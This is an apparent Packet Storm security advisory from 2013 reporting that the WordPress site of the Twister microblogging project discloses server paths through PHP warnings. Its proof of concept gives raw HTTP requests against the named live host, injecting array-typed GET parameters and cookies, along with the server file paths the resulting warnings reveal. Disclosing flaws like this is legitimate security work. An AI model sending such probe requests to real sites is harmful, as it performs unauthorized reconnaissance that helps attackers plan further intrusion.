Twister Peer-To-Peer Microblogging Information Disclosure

2013-01-13T00:00:00
ID PACKETSTORM:124763
Type packetstorm
Reporter Juan Carlos Garcia
Modified 2013-01-13T00:00:00

Description

                                        
                                            `========================================================================  
TWISTER Peer-To-Peer microblogging Multiples Application Error Message ( and disclosing sensitive information)   
========================================================================  
  
TIME-LINE VULNERABILITY  
  
Multiples Advisories but Not Response Not Fixed  
  
-----------------  
Alerts summary  
-----------------  
  
  
Application error message  
**********************  
  
/  
  
author   
  
cat   
  
comment_author_email_46104838c3366e1644fd983230bdf8c5   
  
comment_author_url_46104838c3366e1644fd983230bdf8c5   
  
feed   
  
m   
  
s   
  
wordpress_46104838c3366e1644fd983230bdf8c5   
  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5   
  
/wp-comments-post.php  
  
author   
  
comment   
  
email   
  
url   
  
/wp-login.php  
  
comment_author_email_46104838c3366e1644fd983230bdf8c5   
  
comment_author_url_46104838c3366e1644fd983230bdf8c5   
  
redirect_to   
  
user_email   
  
user_login   
  
wordpress_46104838c3366e1644fd983230bdf8c5   
  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5  
  
  
I. VULNERABILITY  
-------------------------  
  
#Title: TWISTER.NET Multiples Application Error Message ( disclose sensitive information)  
  
#Vendor:http://www.twister.net.co  
  
#Author:Juan Carlos García (@secnight)  
  
#Verified: Francisco Moraga (@BTShell)  
  
#http://asap-sec.com  
  
  
II. DESCRIPTION  
-------------------------  
  
Twister Peer-to-peer microblogging is the fully decentralized P2P microblogging   
platform leveraging from the free software implementations of Bitcoin and BitTorrent protocols.   
  
  
III. PROOF OF CONCEPT  
-------------------------  
  
--Attack details---  
  
Application error message  
-------------------------  
  
Vulnerability description  
*************************  
  
This page contains an error/warning message that may disclose sensitive information.  
  
The message can also contain the location of the file that produced the unhandled exception.  
  
  
Affected items  
---------------  
/   
/wp-comments-post.php   
/wp-login.php   
  
  
Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst  
  
Error message found:   
  
  
<b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />  
  
  
URL encoded GET input author was set to 1  
  
Error message found:   
  
<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>2519</b><br />  
  
GET /?author[$secnight]=1&feed=rss2 HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1;  
comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1;  
wordpress_test_cookie=WP+Cookie+check;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
X-Pingback: http://twister.net.co/xmlrpc.php  
Host: twister.net.co  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
  
  
URL encoded GET input cat was set to 1  
  
Error message found:   
  
<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>1771</b><br />  
  
  
GET /?cat[$secnight]=1 HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;  
wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
Host: twister.net.co  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
  
  
  
Cookie input comment_author_url_46104838c3366e1644fd983230bdf8c5 was set to http%3A%2F%2F1  
  
Error message found:   
  
<b>Warning</b>: strip_tags() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/formatting.php</b> on line <b>3261</b><br />  
  
  
  
  
GET / HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;  
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;  
wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
Referer: http://twister.net.co:80/  
Host: twister.net.co  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
  
  
URL encoded GET input feed was set to 1  
  
Error message found:   
  
<b>Warning</b>: strpos() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/class-wp.php</b> on line <b>331</b><br />  
  
  
GET /?author=1&feed[$secnight]=1 HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;  
wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
Host: twister.net.co  
  
  
Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst  
  
Error message found:   
  
<b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />  
  
  
GET /wp-login.php HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1;  
comment_author_email_46104838c3366e1644fd983230bdf8c5[]=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;  
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
Referer: http://twister.net.co:80/  
  
Host: twister.net.co  
  
Etc   
Etc  
Etc  
.  
.  
.  
  
  
IV. BUSINESS IMPACT  
-------------------------  
  
The impact of this vulnerability:  
  
The error messages disclose sensitive information. This information can be used to launch further attacks.  
  
  
V SOLUTION  
------------------------  
  
Pentesting, Review and Write Secure Code.  
  
  
VI. CREDITS  
-------------------------  
  
This vulnerability has been discovered  
  
by   
  
Juan Carlos García(@secnight)  
  
Verified by  
  
Francisco Moraga (@BTShell)  
  
ASAP-SEC Team Members  
  
Security As Soon As Possible (@Asap_Sec)  
  
  
VII. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`